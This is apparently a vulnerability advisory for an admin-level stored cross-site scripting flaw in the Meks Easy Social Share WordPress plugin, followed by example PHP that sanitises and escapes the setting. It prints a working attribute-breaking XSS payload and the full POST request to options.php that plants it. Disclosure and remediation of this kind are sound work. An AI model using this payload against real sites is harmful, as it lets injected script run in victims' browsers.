wpexploit
Author: Asif Nawaz Minhas
WPEX-ID: 9DEC8AC7-BEFD-4C9D-9A9E-7DA9E395DBF2
History: Sep 26, 2022 - 12:00 a.m.

Meks Easy Social Share < 1.2.8 - Admin+ Stored Cross-Site Scripting

Tags: stored cross-site scripting, xss, admin+ interception, security exploit, meks easy social share

EPSS: 0.001 (percentile 24.8%)

The plugin does not sanitise or escape some of its settings, which allows high-privilege users such as admins to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example, in a multisite setup).

Intercept the request made when saving the settings and put the following payload in the meks_ess_settings[color][custom_color] parameter: %23ffd635%22autofocus%20onfocus%3d%22alert(%2fXSS%2f)%22%2f%2f

POST /wp-admin/options.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 634
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

option_page=meks-ess-settings&action=update&_wpnonce=5d8e1580fd&meks_ess_settings%5Bplatforms%5D%5B%5D=facebook&meks_ess_settings%5Bplatforms%5D%5B%5D=twitter&meks_ess_settings%5Bstyle%5D=1&meks_ess_settings%5Bvariant%5D=1&meks_ess_settings%5Bcolor%5D%5Btype%5D=brand&meks_ess_settings%5Bcolor%5D%5Bcustom_color%5D=%23ffd635%22autofocus%20onfocus%3d%22alert(%2fXSS%2f)%22%2f%2f&&meks_ess_settings%5Blocation%5D=above&meks_ess_settings%5Bpost_type%5D%5B%5D=post&meks_ess_settings%5Blabel_share%5D%5Btext%5D=Share+this&meks_ess_settings%5Blabel_share%5D%5Bactive%5D=0&meks_ess_settings%5Blabel_share%5D%5Bactive%5D=1&submit=Save+Changes

The XSS is triggered when the settings page is viewed again.
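The root cause described above is a settings value that is stored unsanitised and printed back into an HTML attribute unescaped. The following PHP is an added example showing how a WordPress plugin closes both gaps for an option of the shape used in this advisory; it is not the plugin's own code. The option name meks_ess_settings and the option group meks-ess-settings come from the request above; the example_ess_* function names and the set of fields handled are assumptions for illustration.

```php
<?php
/*
 * Added example (not the plugin's own code). Sanitise on save and escape on
 * output for a nested option of the shape meks_ess_settings[color][custom_color].
 * The example_ess_* names and the field list are assumptions for illustration.
 */

// options.php runs the registered sanitize_callback on every save of this
// option, independently of the saving user's capabilities, so the callback is
// the right place to reject a value such as
//   #ffd635"autofocus onfocus="alert(/XSS/)"//
// before it reaches the database.
add_action( 'admin_init', function () {
    register_setting(
        'meks-ess-settings',   // option group, matches the PoC's option_page
        'meks_ess_settings',   // option name
        array( 'sanitize_callback' => 'example_ess_sanitize_settings' )
    );
} );

function example_ess_sanitize_settings( $input ) {
    $input = is_array( $input ) ? $input : array();
    $clean = array();

    // Colour type: only values from a fixed allowlist survive.
    $type = $input['color']['type'] ?? '';
    $clean['color']['type'] = in_array( $type, array( 'brand', 'custom' ), true ) ? $type : 'brand';

    // Custom colour: sanitize_hex_color() returns null for anything that is not
    // a 3- or 6-digit hex colour, so the quote-breaking payload is dropped.
    $color = sanitize_hex_color( $input['color']['custom_color'] ?? '' );
    $clean['color']['custom_color'] = $color ? $color : '';

    // Free-text label: strip tags, octets and line breaks.
    $clean['label_share']['text']   = sanitize_text_field( $input['label_share']['text'] ?? '' );
    $clean['label_share']['active'] = empty( $input['label_share']['active'] ) ? 0 : 1;

    return $clean;
}

// Output side: escape the stored value when it is rendered into an attribute,
// so that even a value that bypassed sanitisation cannot close the quote and
// inject new attributes or event handlers.
function example_ess_render_color_field() {
    $settings = get_option( 'meks_ess_settings', array() );
    $value    = $settings['color']['custom_color'] ?? '';
    printf(
        '<input type="text" name="meks_ess_settings[color][custom_color]" value="%s" />',
        esc_attr( $value )
    );
}
```

Two points a reviewer would check in a fix like this: the sanitize_callback must be registered on the admin_init hook so that it is in place when options.php processes the POST, and sanitisation on save is not a substitute for esc_attr() on output, since values written by an older plugin version or by direct database access still have to be rendered safely.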

